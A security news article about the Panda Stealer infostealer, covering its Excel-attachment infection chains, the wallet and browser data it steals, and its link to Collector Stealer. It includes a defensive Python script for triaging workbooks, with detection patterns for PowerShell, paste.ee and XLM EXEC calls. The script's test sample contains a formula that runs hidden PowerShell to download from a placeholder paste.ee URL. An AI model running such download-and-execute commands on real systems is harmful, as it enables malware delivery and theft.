A new information stealer is targeting cryptocurrency wallets and credentials for applications such as NordVPN, Telegram, Discord and Steam.
Panda Stealer uses spam email and the same elusive fileless distribution method used by a Phobos ransomware campaign recently discovered by Morphisec.
The attack campaign appears to be aimed primarily at users in Australia, Germany, Japan, and the United States.
Panda Stealer was discovered by Trend Micro in early April. Threat researchers have identified two chains of infection used by the campaign.
They said, “In one, there is an .XLSM attachment containing macros that download a loader. Then the loader downloads and runs the main stealer.
“The other chain of infection has an attached .XLS file with an Excel formula that uses a PowerShell command to access paste.ee, a Pastebin alternative that accesses a second encrypted PowerShell command.”
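Both infection chains start from an Excel attachment, so a quick triage of the attachment itself catches them before any PowerShell runs. The script below is an added example written for this page, not tooling from Trend Micro or Morphisec. It opens an OOXML workbook (.xlsx/.xlsm, which is a zip container), reports whether a VBA project part is present, and flags worksheet or Excel 4.0 macrosheet formulas that reference PowerShell, paste.ee, or the XLM `EXEC`/`CALL` functions. The indicator patterns and the constructed sample workbooks are assumptions chosen for illustration; legacy binary .xls (BIFF) files are not zips and are reported as such, since a BIFF-aware tool such as oletools' olevba is needed for those.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET
from xml.sax.saxutils import escape

# Indicator patterns for this example, drawn from the two chains described above
# (PowerShell invoked from a formula, a paste.ee fetch, XLM EXEC/CALL). Assumed, not a
# vendor signature set; a real deployment would tune and extend these.
SUSPICIOUS_FORMULA_PATTERNS = [
    re.compile(r"powershell", re.I),
    re.compile(r"paste\.ee", re.I),
    re.compile(r"\bEXEC\s*\(", re.I),        # Excel 4.0 macro: run a program
    re.compile(r"\bCALL\s*\(", re.I),        # Excel 4.0 macro: call a DLL export
    re.compile(r"-enc(?:odedcommand)?\b", re.I),
]

SHEET_NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

# Parts that can hold formulas: ordinary worksheets and Excel 4.0 (XLM) macrosheets.
FORMULA_PART_PREFIXES = ("xl/worksheets/", "xl/macrosheets/")


def triage_ooxml_workbook(data: bytes) -> dict:
    """Return triage indicators for a workbook supplied as bytes.

    Keys: is_ooxml (zip container or not), has_vba_project (xl/vbaProject.bin present),
    suspicious_formulas (list of (part name, formula text) matching the patterns).
    """
    result = {"is_ooxml": False, "has_vba_project": False, "suspicious_formulas": []}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return result                      # legacy .xls or not a workbook at all
    result["is_ooxml"] = True
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        result["has_vba_project"] = any(n.lower() == "xl/vbaproject.bin" for n in names)
        for name in names:
            if not (name.startswith(FORMULA_PART_PREFIXES) and name.endswith(".xml")):
                continue
            # stdlib ElementTree does not resolve external entities, so untrusted XML is
            # safe to parse here; defusedxml is the stricter choice in production.
            root = ET.fromstring(zf.read(name))
            for f in root.iterfind(".//m:f", SHEET_NS):
                text = f.text or ""
                if any(p.search(text) for p in SUSPICIOUS_FORMULA_PATTERNS):
                    result["suspicious_formulas"].append((name, text))
    return result


def build_sample_workbook(formula: str, with_vba: bool,
                          part: str = "xl/worksheets/sheet1.xml") -> bytes:
    """Constructed minimal OOXML container for testing (not a complete Excel file).

    Writes one cell holding `formula` into `part`; optionally adds a placeholder
    vbaProject.bin (OLE magic only) to simulate a macro-enabled .xlsm.
    """
    sheet_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
        '<sheetData><row r="1"><c r="A1"><f>{}</f><v>0</v></c></row></sheetData>'
        '</worksheet>'
    ).format(escape(formula))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr(part, sheet_xml)
        if with_vba:
            zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0")  # placeholder, not real VBA
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample mirroring the second chain: an XLM formula that shells out to
    # PowerShell and fetches a paste.ee paste (URL is a placeholder, not a real IOC).
    sample = build_sample_workbook(
        'EXEC("powershell -w hidden -c iwr https://paste.ee/r/EXAMPLE")',
        with_vba=False, part="xl/macrosheets/sheet1.xml")
    print(triage_ooxml_workbook(sample))
```

In a mail-gateway or sandbox pipeline the same function runs over every Office attachment; a hit on `has_vba_project` or a non-empty `suspicious_formulas` is enough to quarantine for analyst review without executing anything.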
Once installed, Panda Stealer can collect details such as private keys and records of past transactions from its victim’s various digital wallets, including Dash, Bytecoin, Litecoin and Ethereum.
Panda Stealer can also take screenshots of the infected machine and extract browser data such as cookies, saved passwords and payment card details.
The researchers linked the campaign to an IP address assigned to a virtual private server rented from Shock Hosting. Shock Hosting said the server assigned to that address has been blocked.
Panda Stealer was identified as a variant of Collector Stealer, which was cracked by the Russian threat actor NCP, also known as su1c1de.
“Because the cracked Collector Stealer-Builder is openly available online, cybercriminals and script kiddies alike can use it to create their own customized version of the stealer and C&C panel,” researchers noted.
Although the two stealers behave similarly, they use different command-and-control (C&C) server URLs, build tags, and execution folders.
Michael Gorelik, CTO and head of Morphisec's threat intelligence team, has seen the number of infostealers skyrocket since the Emotet botnet was disrupted.
Analyzing the attacks Morphisec detected on seven million corporate endpoints over the past 12 months, Gorelik found that infostealers accounted for the largest share of attempted endpoint attacks (31%).